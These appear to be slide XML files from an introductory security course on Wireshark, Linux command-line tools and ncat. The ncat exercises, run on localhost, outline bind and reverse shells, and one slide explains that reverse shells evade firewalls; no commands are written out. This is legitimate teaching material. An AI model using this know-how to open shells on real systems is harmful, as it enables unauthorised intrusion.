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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Objectives for this section:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>interact with a linux system through the command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>read pcaps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>understand TCP/IP basics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8" name="Shape 58"/>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pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools covered:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use Wireshark to read pcaps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pcaps are captures of raw network traffic (would not be human-readable w/out a tool like wireshark)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Control a linux system through the command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is important because the command line is the most low-level/simplest way to interact with a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The objective of most remote exploits is to send the attacker a “shell” (basically just a linux command line interface)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>General-purpose networking tool</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Shape 6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4" name="Shape 6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lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wireshark is a GUI tool that is capable of a variety of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GUI for network traffic analysis: the standard Wireshark GUI is divided in half horizontally. The top half displays all packets in the capture. The bottom half displays the details of a selected packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read pcap files: Wireshark can be used to read properly formatted *.cap or *.pcap files. These files contain recordings of raw network traffic from some time in the past. The Wireshark GUI reads in the raw data and adds organization to make it human-readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>View real-time network traffic: Instead of reading a recording from a file, wireshark may read data straight off a network interface and display it in real-time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inspect data at all layers of the network stack: In the bottom half of the Wireshark GUI, a user can expand and collapse various parts of an individual packet to examine data from any layer of the OSI model. This data can range from application-layer data (e.g. the text of a web page) at the high end all the way down to the raw bytes of a packet on the low end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Much more: Wireshark’s capabilities extend far beyond what is presented here.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 name="Shape 69"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 7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1" name="Shape 7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lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wireshark Exercise (~10 - 15 min)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students open http.pcap in wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Review structure of TCP/IP packets (7-layer OSI model)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify 7 layers in first packet in http.pcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Review TCP 3-way handshake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify TCP 3-way handshakes in http.pcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Review TCP connection teardowns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify TCP connection teardowns in http.pcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Allow students time to find credentials within the pcap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Shape 7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7" name="Shape 7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lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Although GUI applications like wireshark are easy to use, command-line tools are generally less cpu-intensive and easier to automate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>FS Navigation commands: similar to double-clicking on folders in Mac Finder or Windows Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Text Editors: tools that allow users to edit files from the command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Compilers: convert programs written in compiled languages ( e.g. C or C++) to machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Interpreters: run programs written in interpreted languages (e.g. python, perl)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Text Parsing: tools used for searching and filtering through large text dumps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Networking: tools used for connecting to other systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ssh: send commands to another machine remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>wget/curl: interact with http protocol like a web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Man: To get more information about any command type the command “man some-command” to read the command’s manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Shape 8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3" name="Shape 8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lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pipes and redirects are an automation feature of the linux command-line that is not possible with most GUI applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pipe: allows user to use the output of one command as the input to another command (allow students to run example)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Redirect: allows user to save the output of a command in a file for future use or further processing (allow students to run example)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Shape 8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9" name="Shape 89"/>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lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat is a basic networking tool that allows a user to establish raw TCP (or UDP) connections. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ncat’s simplicity and prevalence makes it useful for attackers operating in restricted environments. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When no other options are available, ncat can be used for file transfer, remote control, and data exfiltration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Shape 9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5" name="Shape 95"/>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98450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the simplest use case, a user need only specify a host and a port to connect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Other options are available for more advanced functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>verbose - outputs debugging information that may be useful when attempting to troubleshoot connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>listen - runs ncat in ‘server mode’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>only specify a port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ncat will listen for connections from other machines instead of trying to reach out and connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UDP - non-default option to run ncat in UDP mode (if not specified, ncat will automatically create TCP connections)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute - run a program on the connection that was created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>program’s std-output becomes outgoing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>incoming data gets piped to program’s std-input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 name="Shape 99"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 10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1" name="Shape 101"/>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98450" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(Ncat Exercise ~10 min) Beyond simple network connections, ncat can be used to establish basic command &amp; control infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scenario: simple client/server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students create an ncat server that listens on 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students connect to 127.0.0.1 with ncat client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students verify that data sent from one end arrives on the other end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Discuss difference between client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Discuss difference between attacker and victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scenario: server victim, client attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students create an ncat bind shell that listens on 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students connect to 127.0.0.1 with ncat client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students verify that the server returns results of commands sent by the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scenario: server attacker, client victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students create an ncat server that listens on 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students connect to the server with ncat reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Students verify that the client returns results of commands sent by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Question: What is the benefit to creating a reverse shell to exploit a target rather than a bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Answer: Reverse shells are better at avoiding firewalls. It is typical behavior for a host to “call out” to a server to receive information (this is what happens when a web browser retrieves a web page). Firewalls don’t block this kind of traffic as much. It is atypical for a host to listen to incoming connections unless it is some kind of server. Firewalls are typically more restrictive of incoming traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
